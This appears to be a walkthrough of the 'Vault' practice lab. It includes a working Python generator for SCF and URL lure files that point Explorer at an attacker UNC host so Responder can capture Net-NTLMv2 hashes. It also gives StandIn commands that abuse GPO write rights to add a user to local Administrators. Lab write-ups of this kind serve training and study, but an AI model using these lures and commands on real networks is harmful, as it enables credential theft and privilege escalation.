Stealing Hashes with Responder, GPO Permissions & Unintended Ways – Vault @ PG Practice
We are solving Vault from PG Practice. The foothold comes from planting SCF/LNK/URL lure files on a writable SMB share: when a user browses the share, Explorer tries to load each file's icon from the UNC path embedded in it and authenticates to our Responder listener, which captures the Net-NTLMv2 hash for offline cracking. For root, we abuse GPO permissions, then explore two unintended privilege escalations.
Notes
Creating SCF/LNK/URL lure files via hashgrab (first argument is the IP Responder listens on, second is the file name prefix; drop all generated variants on the share, since which one fires depends on the victim's Windows build):
python3 ~/tools/hashgrab/hashgrab.py <ip> xct
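As an added example (not hashgrab's own code), the generator below shows what the SCF and URL lures actually contain: both point an `IconFile` entry at a UNC path on the attacker host, so Explorer opens an SMB connection and sends NTLM credentials when it renders the directory. The LNK variant is omitted because it is a binary format. The IP `10.10.14.5`, the share name `share` and the `@xct` prefix are assumptions; the leading `@` only sorts the file to the top of the listing.

```python
"""Generate SCF and URL lure files that force Explorer to authenticate to an
attacker-controlled UNC path. Constructed example, not hashgrab's code.
Assumptions: attacker IP 10.10.14.5, share name 'share', prefix 'xct'."""
import re
import tempfile
from pathlib import Path


def scf_payload(attacker_ip: str, share: str = "share") -> str:
    # Explorer resolves IconFile while rendering the folder, which opens an
    # SMB session to attacker_ip and performs NTLM authentication.
    return "\n".join([
        "[Shell]",
        "Command=2",
        f"IconFile=\\\\{attacker_ip}\\{share}\\icon.ico",
        "[Taskbar]",
        "Command=ToggleDesktop",
        "",
    ])


def url_payload(attacker_ip: str, share: str = "share") -> str:
    # Same trick for Internet Shortcut files: the icon and working directory
    # live on the attacker's UNC path. The URL itself is never visited.
    return "\n".join([
        "[InternetShortcut]",
        "URL=http://localhost",
        f"WorkingDirectory=\\\\{attacker_ip}\\{share}",
        f"IconFile=\\\\{attacker_ip}\\{share}\\icon.ico",
        "IconIndex=1",
        "",
    ])


def unc_targets(text: str) -> list:
    # Sanity check before uploading: every UNC path in the lure must point at
    # the host where Responder is listening.
    return re.findall(r"\\\\\S+", text)


def write_lures(attacker_ip: str, name: str = "xct",
                outdir: str = None, share: str = "share") -> list:
    # Writes @<name>.scf and @<name>.url with CRLF line endings (Windows
    # parsers are tolerant, but this matches what Explorer would write itself).
    out = Path(outdir) if outdir else Path(tempfile.mkdtemp(prefix="lures-"))
    written = []
    for ext, body in (("scf", scf_payload(attacker_ip, share)),
                      ("url", url_payload(attacker_ip, share))):
        path = out / f"@{name}.{ext}"
        path.write_bytes(body.replace("\n", "\r\n").encode("ascii"))
        written.append(path)
    return written


if __name__ == "__main__":
    for p in write_lures("10.10.14.5"):
        print(p, unc_targets(p.read_text()))
    # Next steps, run by hand (not by this script):
    #   sudo responder -I tun0
    #   smbclient //<target>/<share> -U <user> -c 'put @xct.scf; put @xct.url'
```

Once the files are on the share, Responder's SMB server answers the incoming connection and logs the Net-NTLMv2 challenge/response; the `unc_targets` check catches the common mistake of building the lures with the wrong interface's IP before they are uploaded.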
GPO abuse via StandIn (list the GPOs, dump the ACL of the target GPO to confirm our user has write rights on it, then use that right to add our user to the local Administrators group; the gpupdate forces the host to apply the modified policy, after which the new local admin membership can be confirmed):
.\standin --gpo
.\standin --gpo --filter "Default Domain Policy" --acl
.\standin --gpo --filter "Default Domain Policy" --localadmin anirudh
cmd /c "gpupdate /force"
Other resources: